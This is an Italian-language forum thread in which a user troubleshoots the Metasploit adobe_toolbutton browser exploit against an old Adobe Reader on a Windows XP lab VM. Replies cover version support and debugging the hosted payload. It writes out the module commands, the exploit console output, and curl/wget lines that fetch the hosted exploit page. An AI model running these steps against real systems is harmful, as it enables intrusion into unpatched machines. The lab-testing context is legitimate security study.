Domanda Malfunzionamento di metasploit o scorretto utilizzo? Adobe Reader ToolButton

[aleff-inforge]

Salve a tutte e tutti, sto provando a simulare un attacco facendo leva sulla vulnerabilità nota Adobe Reader ToolButton [1] tramite metasploit.
Utilizzo una macchina virtuale con Windows XP SP3 e Adobe Reader 9.0.
Questi sono i comandi che eseguo dopo aver lanciato metasploit:

use exploit/windows/browser/adobe_toolbutton
set TARGET 0
set LHOST <mio_ip_locale>
set SRVHOST <mio_ip_locale>
exploit

viene generato un link tipo http://<mio_ip_locale>:8080/e48Ef1eqM al quale clicco tramite Internet Explorer sulla macchina virtuale.

Reazione VM:
- Apertura di un documento PDF vuoto

Reazione metasploit:

[*] <mio_ip_locale>   adobe_toolbutton - Sending HTML response to <mio_ip_locale>
[*] <mio_ip_locale>   adobe_toolbutton - request: /e48Ef1eqM/MYmLAV/
[*] <mio_ip_locale>   adobe_toolbutton - Sending PDF...

Mantenendo una riga vuota, come se effettivamente avessi una shell aperta ma se provo a scrivere un comando tipo dir l'output che viene mostrato è relativo alla mia macchina e non alla VM e dopo mi esce di nuovo la scritta msf6 exploit(windows/browser/adobe_toolbutton) > come se avesse chiuso la shell creata e per tornare a quella situazione devo ricaricare il link http://<mio_ip_locale>:8080/e48Ef1eqM dalla VM.

[1] https://www.rapid7.com/db/modules/exploit/windows/browser/adobe_toolbutton/

 

[JunkCoder]

Dal link che hai postato tu:

At the moment, this module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used

Quindi se vuoi testarlo in quel modo installa Adobe Reader 11.0.2

 

[aleff-inforge]

Quindi se vuoi testarlo in quel modo installa Adobe Reader 11.0.2

Grazie per aver risposto, provando a farlo funzionare su Adobe Reader 11.0.2 mi da come errore XMLHttpRequest non definito, hai idea di cosa potrebbe essere?
Firewall, Aggiornamenti automatici e Protezione da virus sono disabilitati.

Messaggio unito automaticamente: 16 Novembre 2022

Notavo inoltre che nelle impostazioni avanzate dell'exploit risultano alcune impostazioni settate a false nonostante ci sia scritto yes sotto la colonna Required, questa cosa potrebbe incidere?

 

[0xbro]

Sembra essere un problema dell'exploit (quello che viene hostato e poi aperto dal browser). E' abbastanza complesso da debuggare poichè è tutto offuscato, puoi dargli un occhi tu stesso scaricando direttamente il sorgente hostato: $ wget http://192.168.1.80:8080/f1sRWSzBQLR

Sto cercando in giro per capire se si tratti di un problema noto

 

[aleff-inforge]

Ho esportato il documento tramite

$ curl http://192.168.50.149:8080/oItIr8eEge99SR --output asd.pdf

e l'ho passato alla VM ma mi dava errore perché risultava "incompleto".
Ho modificato il nome da asd.pdf ad asd.txt e ho riprovato a passarlo, ora me l'ha fatto fare.
Ho rinominato nella VM il nome da asd.txt ad asd.pdf e provando ad aprirlo sia con Adobe Reader 11.0.2 che con Internet Explorer mi da errore nell'elaborazione del documento.

PS: Nella console di metasploit non è avvenuto nulla aprendo il file in locale

 

[0xbro]

Ho esportato il documento tramite

$ curl http://192.168.50.149:8080/oItIr8eEge99SR --output asd.pdf

e l'ho passato alla VM ma mi dava errore perché risultava "incompleto".
Ho modificato il nome da asd.pdf ad asd.txt e ho riprovato a passarlo, ora me l'ha fatto fare.
Ho rinominato nella VM il nome da asd.txt ad asd.pdf e provando ad aprirlo sia con Adobe Reader 11.0.2 che con Internet Explorer mi da errore nell'elaborazione del documento.

Visualizza allegato 66465

PS: Nella console di metasploit non è avvenuto nulla aprendo il file in locale

Sì quello è normale, il file è un file HTML che si occupa di comunicare con la C&C (metasploit) e scaricare successivamente il PDF.

Al momento non ho un ambiente con un Adbobe vecchio però, quindi non riesco a fare test dinamici.. stavo provando ad analizzare solo il codice ma è un po' complicato ahah